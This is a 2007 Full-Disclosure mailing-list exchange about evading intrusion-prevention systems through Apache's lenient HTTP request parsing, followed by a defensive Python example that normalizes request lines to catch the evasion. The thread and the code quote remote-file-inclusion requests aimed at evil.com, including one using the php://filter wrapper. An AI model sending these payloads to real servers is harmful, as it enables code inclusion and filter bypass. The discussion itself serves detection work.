Date: Wed, 20 Jun 2007 17:50:55 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Jamie Riden" <jamie.riden@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IPS Evasion with the Apache HTTP Server

Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A@...urity.nnov.ru:


JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

The original BreakingPoint article the author refers to says "The intent is
to describe the strange behaviors of network applications". It mentions
no IPS products, only IIS and Apache. And at least one case of
Apache behavior is partially expected (because of the RFC) and already
described (by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

IPS may detect known attacks. Just like antivirus, you may use IPS to
protect against known viruses/exploits. The ability to bypass an IPS with
a new one is not a bug. I do collect different content filtering bypass
methods:

http://securityvulns.com/advisories/content.asp

You simply MUST accept the risk that there is always a way to bypass
content filtering. An IPS doesn't protect your network by itself. IPS
is nothing but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request", when it should actually be alerting that an
JR> RFI attempt was made.

In this situation the IDS/IPS should alert that an unsupported request
attempt was made, and block this attempt in the case of an IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that an RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I can write a buggy application, and an attempt to exploit it will never
be detected by existing signatures.

-- 
~/ZARAZA http://securityvulns.com/
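The evasion discussed in this thread is a parser mismatch: the inspection device rejects a request line the server still processes. As an added example (not code from the thread or from BreakingPoint), this Python compares a strict request-line parser with one that tolerates leading blank lines and VT/FF separators, then applies the same remote-include check to both. The two quoted requests come from the thread; the scheme list and the benign control request are assumptions for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Strict parser: stands in for an IDS/IPS that only accepts
# "METHOD SP Request-URI SP HTTP-Version CRLF" at the start of the stream.
STRICT_LINE = re.compile(rb"\A[A-Z]+ (\S+) HTTP/\d\.\d\r\n")
# Tolerant parser: also treats VT (\x0b) and FF (\x0c) as separators,
# as the quoted request relies on, not just the SP/HT the RFC allows.
SEPARATORS = re.compile(rb"[ \t\x0b\x0c]+")
# Schemes that make an include parameter point at remote content. php://
# covers the php://filter wrapper from the thread; the others are assumed.
REMOTE_SCHEMES = {"http", "https", "ftp", "php", "data"}

def strict_target(raw: bytes):
    """Request-URI as a strict parser sees it; None if it rejects the request."""
    m = STRICT_LINE.match(raw)
    return m.group(1).decode("latin-1") if m else None

def tolerant_target(raw: bytes):
    """Request-URI after skipping leading blank lines and splitting on the
    wider separator set; the method token may be absent, as in the sample."""
    first_line = raw.lstrip(b"\r\n").split(b"\r\n", 1)[0]
    tokens = [t for t in SEPARATORS.split(first_line) if t]
    return next((t.decode("latin-1") for t in tokens if t.startswith(b"/")), None)

def rfi_indicators(target):
    """(param, value) pairs whose value begins with a remote scheme."""
    if target is None:
        return []
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            scheme = value.split("://", 1)[0].lower() if "://" in value else ""
            if scheme in REMOTE_SCHEMES:
                hits.append((name, value))
    return hits

def inspect(raw: bytes):
    return rfi_indicators(strict_target(raw)), rfi_indicators(tolerant_target(raw))

# First two requests are quoted in the thread; the third is constructed as a control.
SAMPLES = {
    "evasive": b"\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n",
    "wrapper": b"GET /rfi.php?includedir=php://filter/resource=http://www.evil.com HTTP/1.0\r\n\r\n",
    "benign": b"GET /rfi.php?includedir=templates HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, inspect(raw))   # evasive: strict sees nothing, tolerant flags it
```

The point is that the same signature fires on the evasive request once the detector normalizes the request line the way the server does; the strict parser returns nothing for it at all.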


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
